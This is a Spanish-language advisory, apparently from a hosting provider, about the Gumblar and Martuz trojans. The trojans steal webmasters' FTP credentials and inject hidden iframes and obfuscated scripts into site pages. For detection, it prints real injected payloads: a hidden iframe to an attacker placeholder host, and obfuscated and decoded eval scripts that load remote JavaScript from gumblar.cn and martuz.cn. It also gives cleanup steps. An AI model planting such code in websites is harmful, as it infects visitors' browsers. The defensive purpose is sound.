Inyección de código y ataques al sitio web.
En los últimos meses hemos detectado a través de llamadas y consultas de nuestros usuarios por un incremento notable de ataques de modificación o inyección de código por parte de virus en sitios web de Internet.
Esto motivó que envíasemos a todos nuestros usuarios una alerta por correo electrónico informando que se estában produciendo dichos ataques.
Muchos webmasters de momento se dan cuenta que en los documentos de componen su sitio web aparecen líneas de código extrañas que muestran enlaces hacia sitios externos de forma invisible.
Realmente se trata de código que no ha sido introducido por el webmaster ni por su editor web sino que se trata de virus de tipo troyano que una vez que han infectado el PC del webmaster detectan buscan códigos ftp en el ordenador y los utiliza para inyectar el iframe en los documentos del sitio web.
Las páginas web que se ven afectados con más frecuencia son las del tipo index.php, index.htm, index.html, pero en ocasiones, en el caso de que el sitio web sea dinámico y esté basado en plantillas, tpls etc (blogs, wikis, cms) pueden verse afectados todos los archivos del sitio.
Estos virus aprovechan la vulnerabilidad existente en versiones antiguas de softare como Adobe Reader (muy utilizado para abrir pdfs) o Adobe Flash Player (software pare ejectuar películas de flash), aunque también puede producirse a través de otros programas.La forma más habitual de infección es la inyección de un iframe en el/los documentos html que componen el sitio.
Ejemplos de códigos maliciosos inyectados son:
<iframe src=”http://webdelatacante:8080/index.php” mce_src=”http://swebdelatacante:8080/index.php” width=107 height=152 style=”visibility: hidden”></iframe>
O codigos más complejos como:
(function(jil){var xR6p=’%’;eval(unescape((’var”20a”3d”22Sc”72iptEngin”65″22″2c”62″3d”22″56ers”68on()+”22″2c”6a”3d”22″22″2cu”3dnavig”61t”6 …………… “65rAgent”3bif((”75″2eind”65xOf”28″22Win”22)”3e0)”26″26(u”2e”69n”64exO”66(”22NT”20″36″22″29″3c0)”26″26(documen”74″2ecookie”2e”68ndex”4f”66″28″22″6die”6b”3d1″22)”3c0)”26″26″28t”79″70e”6ff3bdocu”6de”6e”74″2ewr”69″74e(”22″3csc”72ipt”20sr”63″3d”2f”2fgumblar”2ecn”2frss”2f”3fid”3d”22+j+”22″3e”3c”5c”2f”73cript”3e”22″29″3b”7d’).replace(jil,xR5p)))})(/”/g);
En la mayoría de los casos la función no tiene nombre, es anónima y de autollamada.Estas acciones son provocadas por troyanos del tipo Gumblar, Martuz o variantes de los mismos.
¿Como debo proceder para prevenir y/o eliminar la infección?
- Vacíe la caché de su navegador.
- Desactive la caché de su navegador.
- Desinstale los programas Adobe Acrobat Reader y Adobe Flash Player – Actualice su antivirus y haga un análisis completo de su ordenador
- Instale las últimas versiones de Adobe Acrobat Reader y Adobe Flash Player desde la web oficial de Adobe.
- Limpie el código malicioso, buscándolo en todas las páginas que conforman su sitio web y eliminando las líneas de código con aspecto similar a:
(function(){var G33z1=’%’;var KlKj=’va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-2626(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d’;var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();
_________________________________________________________________________________________
<iframe src=”http://webdelatacante:8080/index.php” mce_src=”http://webdelatacante:8080/index.php” width=107 height=152 style=”visibility: hidden”></iframe> __________________________________________________________________________________________
var a=”ScriptEngine”,b=”Version()+”,j=””,u=navigator.userAgent;
if((u.indexOf(”Chrome”)<0)&&(u.indexOf(”Win”)>0)&&(u.indexOf(”NT 6″)<0)&&(document.cookie.indexOf(”miek=1″)<0)&&(typeof(zrvzssfs)!=typeof(”A”))){
zrvzts=”A”;eval(”if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);
document.w rite(”<script src=//martu”+”z.cn/vid/?id=”+j+”><\/script>”);}
La búsqueda del código malicioso, si el sitio web está compuesto por una gran cantidad de documentos puede ser una labor muy tediosa, para hacerlo algo más cómodo puede buscar en todo el sitio web automáticamente con su editor web por cadenas de palabras, por ejemplo:
Buscar en todo el sitio las palabras
Iframe
script src =” Martuz for-like
visibility: hidden
Cuando encuentre esas líneas de código, fíjese en ellas y si no han sido introducidas por usted, elimínelas de su código fuente en todos aquellosdocumentos de su web en los que estén presentes.
Una vez limpiado el código de su sitio web, recuerde CAMBIAR LA CONTRASEÑA FTP y solicitar a cualquier otra persona que haya tenido acceso a su hosting mediante ftp (diseñador web, programador …) que realice las mismas acciones.
Facebook
Twitter